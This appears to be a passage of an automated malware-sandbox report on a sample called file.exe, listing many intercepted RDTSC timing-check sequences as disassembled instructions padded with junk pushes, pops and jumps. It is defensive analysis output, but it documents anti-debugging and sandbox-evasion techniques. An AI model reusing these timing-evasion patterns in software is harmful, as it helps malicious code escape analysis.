Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94B8BE second address: 94B8C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94BC7D second address: 94BC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F052CEB1F1Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94BC98 second address: 94BC9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94BC9C second address: 94BCA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94BCA0 second address: 94BCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94BCA9 second address: 94BCAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94BCAE second address: 94BCB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94C0FB second address: 94C0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94C3C7 second address: 94C3E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F052CBC2112h 0x00000009 jne 00007F052CBC2106h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94C3E3 second address: 94C40A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F26h 0x00000007 jmp 00007F052CEB1F1Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94CD83 second address: 94CD88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94B30F second address: 94B31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94B31C second address: 94B321 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94B321 second address: 94B327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94B327 second address: 94B338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F052CBC2112h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94B338 second address: 94B34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F052CEB1F16h 0x0000000a js 00007F052CEB1F18h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94B34A second address: 94B354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F052CBC2106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94B354 second address: 94B365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jne 00007F052CEB1F16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 95438E second address: 9543C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2112h 0x00000007 jmp 00007F052CBC210Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F052CBC210Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9543C0 second address: 9543D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F052CEB1F1Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 953F52 second address: 953F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 954093 second address: 95409D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 95409D second address: 9540A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9540A3 second address: 9540A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 956691 second address: 956695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 956695 second address: 9566A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F052CEB1F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9566A5 second address: 9566BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC2113h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9566BC second address: 9566C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95651C second address: 956528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F052CBC2106h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956528 second address: 956537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F052CEB1F1Ah 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956537 second address: 956555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F052CBC2118h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956555 second address: 956559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96349A second address: 9634D5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F052CBC2106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F052CBC2113h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 jmp 00007F052CBC2114h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9634D5 second address: 9634E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F052CEB1F16h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96305D second address: 963074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F052CBC2106h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jnc 00007F052CBC2106h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B242 second address: 96B246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B246 second address: 96B267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F052CBC2115h 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B267 second address: 96B273 instructions: 0x00000000 rdtsc 0x00000002 je 00007F052CEB1F1Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B273 second address: 96B27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B27A second address: 96B294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CEB1F1Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B294 second address: 96B29A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89757D second address: 897594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F052CEB1F1Fh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897594 second address: 89759A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89759A second address: 8975AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jng 00007F052CEB1F33h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DEF2 second address: 97DF06 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F052CBC2106h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F052CBC2106h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97C906 second address: 97C91F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D22B second address: 97D231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D231 second address: 97D24D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F28h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DC15 second address: 97DC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F052CBC2106h 0x0000000c popad 0x0000000d jc 00007F052CBC2108h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F052CBC2106h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89FBCA second address: 89FBCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89FBCE second address: 89FBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC2116h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89FBEE second address: 89FBF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89FBF4 second address: 89FBF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 982D6C second address: 982D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 982A3D second address: 982A47 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F052CBC2106h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 982A47 second address: 982A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F052CEB1F29h 0x0000000b push ecx 0x0000000c jmp 00007F052CEB1F1Dh 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EC02 second address: 98EC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F052CBC2106h 0x0000000a js 00007F052CBC2106h 0x00000010 jmp 00007F052CBC210Ch 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EC1F second address: 98EC37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F052CEB1F2Fh 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B72F3 second address: 9B72F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B62BC second address: 9B62DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jne 00007F052CEB1F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F052CEB1F22h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B62DE second address: 9B62E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B62E2 second address: 9B630C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F22h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007F052CEB1F16h 0x00000012 push esi 0x00000013 pop esi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B630C second address: 9B6312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6312 second address: 9B632A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F052CEB1F1Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B632A second address: 9B6332 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B661F second address: 9B6629 instructions: 0x00000000 rdtsc 0x00000002 js 00007F052CEB1F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B67A1 second address: 9B67CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jl 00007F052CBC2106h 0x0000000b jmp 00007F052CBC2119h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B67CD second address: 9B67E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F052CEB1F25h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B67E9 second address: 9B67ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B67ED second address: 9B67F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6FBE second address: 9B6FC3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6FC3 second address: 9B6FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6FC9 second address: 9B6FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 jbe 00007F052CBC2106h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6FDE second address: 9B6FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CEB1F1Eh 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b jg 00007F052CEB1F16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6FFA second address: 9B7002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B893F second address: 9B895C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F052CEB1F23h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B895C second address: 9B897B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F052CBC2116h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B897B second address: 9B898F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a jc 00007F052CEB1F3Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B898F second address: 9B8995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB292 second address: 9BB296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB296 second address: 9BB2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F052CBC2115h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB2B6 second address: 9BB2BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB4B6 second address: 9BB4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC2112h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB4CD second address: 9BB54E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F052CEB1F21h 0x00000008 jne 00007F052CEB1F16h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 call 00007F052CEB1F22h 0x00000019 pushad 0x0000001a mov ecx, dword ptr [ebp+122D2BE2h] 0x00000020 jmp 00007F052CEB1F22h 0x00000025 popad 0x00000026 pop edx 0x00000027 push 00000004h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007F052CEB1F18h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 push 77CE1561h 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b js 00007F052CEB1F16h 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB777 second address: 9BB77C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB77C second address: 9BB782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB782 second address: 9BB786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB786 second address: 9BB7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edx, dword ptr [ebp+122D2AD4h] 0x0000000f push dword ptr [ebp+122D17CEh] 0x00000015 sub edx, dword ptr [ebp+1246FF22h] 0x0000001b call 00007F052CEB1F19h 0x00000020 push ebx 0x00000021 push edi 0x00000022 jl 00007F052CEB1F16h 0x00000028 pop edi 0x00000029 pop ebx 0x0000002a push eax 0x0000002b jmp 00007F052CEB1F1Dh 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F052CEB1F29h 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB7E1 second address: 9BB7EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F052CBC2106h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB7EB second address: 9BB7EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB7EF second address: 9BB808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F052CBC2106h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB808 second address: 9BB80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCC65 second address: 9BCC69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCC69 second address: 9BCC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F052CEB1F16h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCC79 second address: 9BCC7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCC7D second address: 9BCC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
